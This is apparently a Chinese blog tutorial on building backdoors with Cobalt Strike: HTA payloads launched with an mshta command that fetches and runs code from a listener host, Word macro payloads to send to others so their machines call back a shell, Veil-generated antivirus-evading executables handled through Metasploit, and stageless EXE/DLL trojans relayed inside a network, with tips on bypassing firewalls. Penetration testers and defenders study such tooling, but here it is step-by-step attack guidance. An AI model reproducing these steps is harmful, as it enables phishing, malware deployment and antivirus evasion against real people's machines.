CobaltStrike之后门生成

一.Payload介绍

Payload在渗透测试中大家可以简单地理解为一段漏洞利用/植入后门的代码或程序

二.Cobaltstrike生成后门

在这里插入图片描述

1.HTML Application(生成基于HTML的攻击载荷,比如可执行文件,Powershell,VBA)

HTML Application用于生成hta类型的文件。HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别。HTML Application有三种类型的生成方式,测试发现,只有powershell方式生成的hta文件才能正常执行上线,Executable和VBA方式生成的hta文件执行的时候提示当前页面的脚本发生错误。
在这里插入图片描述
演示:基于Powershell方式生成的hta文件,执行上线
(1)生成一个PowerShell的hta文件
(2)选择钓鱼攻击中的文件下载
在这里插入图片描述
(3)设置该文件路径
在这里插入图片描述
(4)生成后将会给一个下载链接
在这里插入图片描述
(5)利用win7访问
cmd中输入命令:mshta http://192.168.188.158:80/download/file.ext
注:mshta是mshta.exe,属于微软Windows操作系统相关程序,用于执行.HTA文件
在这里插入图片描述
(6)返回客户端查看,发现win7成功上线
在这里插入图片描述
另外两种不推荐使用,因为会报如下界面:
在这里插入图片描述

2.MS OFFICE MACRO(生成基于Office的攻击载荷)

演示:
(1)打开此模块,选择监听器,点击Generate
在这里插入图片描述
(2)点击Copy MaCro
在这里插入图片描述
(3)打开word编辑器,点击视图,点击宏,随便写入一个名字,点击创建
在这里插入图片描述
(4)删除里面的代码,粘贴刚才cs中生成的代码进去,保存并退出
在这里插入图片描述
(5)将该文档发给其他人,只要用word打开并且其word开启了宏,我们的CS就会弹回shell,机器成功上线,进程名为rundll32.exe

3.PAYLOAD GENERATOR(载荷生成器,可用于生成C,C#,Java,Python等)

该模块用于生成各种语言版本的shellcode,然后用其他语言进行编译生成
这里便涉及到免杀了,也有免杀框架Veil中的shellcode等
演示(Veil生成免杀payload渗透win10获取shell):
1.kali中默认没有Veil,因此输入以下命令
命令:apt-get update && apt-get install veil
在这里插入图片描述
2.安装后启动veil
在这里插入图片描述
第一次进入时选择y进行加载,加载
加载完后重新打开veil,发现如下图
在这里插入图片描述
此时输入如下命令:
/usr/share/veil/config/setup.sh --force --silent
在这里插入图片描述
最后出现Done为成功安装,因此即可成功打开veil
在这里插入图片描述
3.这里使用1) Evasion
在这里插入图片描述
list列出可用的有效载荷,payloaD共有41种,这里选择13号的cs/shellcode_inject/virtual.py
在这里插入图片描述
在这里插入图片描述
做一些基本配置,然后运行generate生成有效载荷,我们选择4带有shellcode的有效载荷。这里需要输入本机IP和该payload使用的端口,设置成9999
在这里插入图片描述
同时也能看到文件保存位置
在这里插入图片描述
编译后的文件被保存在var/lib/veil/output/compiled/1.exe,新生成的shellcode的rc文件被保存在/var/lib/veil/output/handlers/1.rc,有了rc文件,我们便可以利用msf进行调用
4.在生成的shellcode的rc文件目录下运行
命令:msfconsole -r 1.rc
在这里插入图片描述
5.将生成的1.exe放到win10机器上
在这里插入图片描述
发现立马被D盾查杀(所以这个免杀不是很好),但是360的话可以被绕过,执行1.exe文件,将成功反弹shell
用VT检测
在这里插入图片描述
所以这个免杀不是很好,也说明这个文件在VT是交了很多次

4.Windows Excutable/Windows Excutable(s)(生成EXE,DLL后门)

(1)Windows Excutable生成的后门是WindoWs可执行文件,如exe,dll
在这里插入图片描述
Exe文件运行后,CS即可收到目标主机的会话
至于DLL大家可以使用针对DLL的相关攻击手法,这个我日后会写文章专门来讲
(2)Windows Excutable(S)带有生成出的是stageless版本(无状态Windows后门木马)下面简单说下这个无状态木马的使用方法。一般使用无状态木马的网络环境是这样的
在这里插入图片描述
首先你需要让一台主机作为中转器,配合无状态木马使用
在这里插入图片描述
这里选择中转器的监听器生成木马。需要注意–如果开启了防火墙会产生一个Windows安全警报。因此最好提前用cmd添加一个防火墙放行规则或关闭防火墙,随后便可将无状态的木马上传到内网的其他机器运行后返回一个会话

  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值